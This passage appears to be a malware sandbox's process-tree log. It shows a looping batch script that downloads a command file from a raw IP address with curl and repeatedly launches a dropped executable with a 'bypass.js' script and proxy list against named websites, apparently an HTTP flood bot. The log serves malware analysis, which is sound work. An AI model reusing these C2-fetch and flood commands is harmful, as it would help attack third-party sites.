- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4236
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:752
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1048
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2140
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2248
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3696
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2284
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3572
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3460
- C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
  YzxHTTPs.exe GET https://addicted2.ro/ proxy.txt 40 600 10
  2⤵
  - Executes dropped EXE
  PID:2252
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 40 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4624
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 40 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2040
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 40 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:64
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 40 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3372
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 40 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1124
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 40 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4148
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 40 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2516
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 40 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1280
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 40 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:5088
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://addicted2.ro/ proxy.txt 40 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2444
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3308
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4980
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:984
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1552
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4300
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4016
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4504
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:432
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2956
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5020
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2296
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3192
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2912
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1816
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1948
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:840
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1048
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2140
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:680
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:508
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2284
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3572
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3460
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1708
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2972
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2604
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1892
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4996
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3988
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4484
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2660
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4256
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1296
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1408
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4976
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4572
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1632
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4316
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2736
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3400
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4724
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3216
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3664
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3408
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4056
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4448
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1160
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4184
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3840
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1444
- C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
  YzxHTTPs.exe GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
  2⤵
  - Executes dropped EXE
  PID:2948
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2488
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4944
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3324
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2780
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:448
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4352
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2712
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1616
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3928
- - C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe
    C:\Users\Admin\AppData\Roaming\hjUZ\YzxHTTPs.exe C:\snapshot\manager\bypass.js GET https://beta.bloxrunner.com/ proxy.txt 50 600 10
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1392
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1936
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1324
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3288
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1476
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2296
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4956
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:728
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4160
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:752
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:936
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1676
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1988
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4876
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5088
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3500
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:244
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3572
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3460
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3044
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2972
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2604
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1888
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3624
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3748
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4484
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2660
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2944
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:868
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2332
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4892
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3744
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2440
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4764
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3860
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2024
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4552
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4204
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4988
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3992
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4448
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4532
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4184
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4576
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4920
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1444
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1124
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3708
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:364
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4604
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4596
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1168
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:864
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4524
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3336
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1588
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1132
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1604
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2928
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3248
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3076
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1212
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4100
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:616
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2356
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2088
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2980
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1896
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3312
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4400
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3612
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1760
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2624
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3740
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:428
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2464
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1508
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3876
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4344
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4828
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2124
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3372
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4476
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4712
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2240
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1044
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2388
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2948
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2884
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3056
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2556
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:740
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1352
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4520
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2408
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2956
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5020
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4224
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:436
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4956
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:728
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4160
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4264
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2904
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1256
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1684
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1612
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3556
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3596
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2284
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5044
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2136
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3488
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4844
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1656
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1892
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3080
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4632
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4312
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2900
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1296
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4644
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4440
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3868
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3320
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4736
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3744
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4232
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4592
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:464
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4724
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3216
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3664
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1800
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1628
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1572
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3176
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2616
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2784
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3840
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3144
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1972
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2428
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1128
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1340
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
